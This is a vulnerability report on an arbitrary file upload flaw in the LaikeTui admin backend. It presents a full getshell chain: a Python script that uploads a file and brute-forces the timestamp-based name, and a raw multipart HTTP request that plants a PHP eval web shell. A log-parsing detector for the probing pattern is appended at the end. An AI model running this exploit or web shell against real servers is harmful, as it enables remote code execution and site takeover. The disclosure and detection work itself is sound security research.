LaikeTui
There is an arbitrary file upload (getshell) vulnerability in the admin backend, in software/actions/programAction.class.php.
File Path: software/actions/programAction.class.php#L217
This method takes the extension from the uploaded file name without any restriction and splices it directly into the target file's extension, so a .php file can be uploaded to get a shell.

However, the resulting file name is not returned to the page; time() is used to build it from the current timestamp. As long as the brute-forcing runs backwards from the current time, under normal circumstances it takes no more than three attempts. Below is the script I wrote in Python:
```python
import time
import socket
import requests

host = "127.0.0.1"
port = 80

client = socket.socket()
start = int(time.time())
client.connect((host, port))
file = open("FILE_UPLOAD_HTTP", "rb")  # the raw HTTP upload request shown below
data = file.read()
client.send(data)
client.recv(65535)
client.close()
end = int(time.time())
now = end
coast = end - start
print(f"now: {now}")


def f(now):
    uri = f"http://{host}:{port}/LKT/zip/123123{now}..php"
    r = requests.get(uri)
    if r.status_code != 404:
        print(uri)
        exit()
    time.sleep(1)


for i in range(0, coast + 1):
    f(now)
    now = now - 1
print("No!!!")
```
The HTTP request:

```http
POST /LKT/index.php?module=software&action=add&name=1&image=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 237
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGTdxAdrEarGLzRWy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: admin_mojavi=23bgar1r1bq43q0ro3plbrj148; XDEBUG_SESSION=18445
Connection: close

------WebKitFormBoundaryGTdxAdrEarGLzRWy
Content-Disposition: form-data; name="edition_url"; filename="123123.php"
Content-Type: image/php

<?php
var_dump($_POST);
@eval($_POST["cmd"]);
?>
------WebKitFormBoundaryGTdxAdrEarGLzRWy
```
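From a detection standpoint, the timestamp brute-forcing the script above depends on leaves a clear trace in the web server access log: one client requesting a series of PHP-named files under the /LKT/zip/ upload directory within seconds. The following is an added example, not part of the original report, that flags that pattern; the log lines, the `min_hits` and `window_s` thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (combined format): one client walks a timestamp
# backwards through /LKT/zip/<prefix><timestamp>..php until one request is served.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /LKT/zip/1231231704110400..php HTTP/1.1" 404 0
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /LKT/zip/1231231704110399..php HTTP/1.1" 404 0
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /LKT/zip/1231231704110398..php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /LKT/zip/report.zip HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any file under the upload directory whose name ends in a PHP extension; this
# covers the "..php" name the splice in programAction.class.php produces.
PROBE_RE = re.compile(r'^/LKT/zip/[^/?]*\.php\d?$', re.IGNORECASE)


def parse(line):
    """Parse one access-log line into (ip, timestamp, method, path, status)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)


def find_probing(log_text, min_hits=2, window_s=60):
    """Return {ip: (probe_count, served_paths)} for clients that requested
    min_hits or more PHP files under /LKT/zip/ inside a window_s-second window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and PROBE_RE.match(rec[3]):
            events[rec[0]].append(rec)
    flagged = {}
    for ip, recs in events.items():
        recs.sort(key=lambda r: r[1])
        for i in range(len(recs)):
            j = i
            while j < len(recs) and (recs[j][1] - recs[i][1]).total_seconds() <= window_s:
                j += 1
            if j - i >= min_hits:
                # A 200 among the probes means an uploaded script was actually served.
                served = [r[3] for r in recs[i:j] if r[4] == 200]
                flagged[ip] = (j - i, served)
                break
    return flagged
```

A served path in the result is the one to pull from the upload directory and examine, together with the upload request that preceded the probing.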